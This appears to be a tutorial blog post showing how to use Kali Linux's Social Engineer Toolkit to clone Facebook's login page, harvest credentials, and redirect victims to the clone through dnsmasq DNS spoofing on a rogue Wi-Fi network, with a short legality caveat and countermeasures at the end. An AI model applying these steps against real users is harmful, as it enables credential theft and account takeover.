Kali Linux : Social Engineer Toolkit (Phishing)

 

In this guide we’ll be exploring a small handful of the feature of Trusted Sec’s SET (Social Engineer Toolkit).

You’ll learn about credential harvesting. This involves using SET to clone a legitimate website such as Facebook’s login page. Any users who try to enter their username and password will in fact be sending their details to SET, which will copy their credentials and then forward them to the real website.

 

Is this legal?

When you first fire up the SET, you’ll be asked to promise that you’ll only use it for legitimate penetration testing. This means that you have the permission

of both the network owner and anyone likely to connect their device to your rogue AP.

There’s nothing illegal in itself about using hacking tools or equipment and indeed it’s essential to have access to the same tools as evil hackers in order to protect users from them.

 

SET is written in Python it can run in virtually any distribution of Linux. However, you may prefer to simply download and run Kali, which comes with SET preinstalled.

(Download Kali from : https://www.kali.org/).

 

One of the most terrifying aspects of the SET is that it’ll work on almost every device.

While there have been great strides towards preventing DNS poisoning , if you control the network to which a user connects, it’s very likely you can divert requests for legitimate websites to your cloned page.

 

DNS (Domain Name System) servers form the backbone of the internet, they act as a form of virtual telephone directory, translating human readable web addresses such as www.google.com to a machine readable IP address.

DNS Spoofing, sometimes known as DNS Cache Poisoning, involves corrupting the data on a DNS Server to divert attempts to visit a certain website to the IP address of your choice, in our case, the cloned web page created with SET.

 

With Linux, you can use the tool dnsmasq to create a custom DNS server and redivert traffic in this way.

To install the tool from terminal :

sudo apt-get install dnsmasq-base

 

Then can configure by edit the file:

/etc/dnsmasq.conf

 

And add :

no-dhcp-interface=
server=8.8.8.8
no-hosts
addn-hosts=/etc/dnsmasq.hosts

 

Then configure the file /etc/dnsmasq.hosts :

And add the couple :
<machine-ip> <target-url>

For example:
192.168.1.200 www.facebook.com

 

And finally relaunch the service with the commands:

Killall -9 dnsmasq
Dnsmasq –no-daemon –log-queries

 

SET(Social Engineer Toolkit)

The simplest way to get started with SET is to download and boot a “Live” version of Kali Linux. We will focus on using SET’s site cloner to create a copy of a Facebook login page.

click the Applications menu will find SET under the Social Engineering category.

 

Once SET loads:

Choose Option 1) Social Engineering Attacks

 

then option 2) Website Attack Vectors

 

then Option 3) Credential Harvester Attack Method

 

Finally choose Option 2) Site Cloner

 

SET will ask you to specify the IP address to use for the cloned page. Press Return to continue.

 

Next, SET will ask you to enter the URL to clone, and in this case it is: www.facebook.com

 

Once SET finished to clone,listen for incoming connection.Open the browser on the same machine where the harvester is running and type your local IP, for example 192.168.1.200. You should see the spoof web-page load. Any possible usernames and passwords are written in red. once the cloned page harvests user details it’ll divert them to the correct URL.

Now, a real hacker would have some trouble persuading users to type in the IP of his machine rather than the proper URL. You can simulate a real hack by setting up a DNS server to divert them to your fake web page. (See Dnsmasq suggested previously)

 

Consideration

A real case, could be, when you use Free wifi connection, found in (airport, city center…), an hacker can set up a rouge WI-FI Access Point, where can divert traffic to cloned web page.
A valid contromisure that a user can adopt is to use a VPN service or service like TOR, that use theri own DNS server. Where possible, use authentication system that support two-step authentication, that notify when a new device try to log in.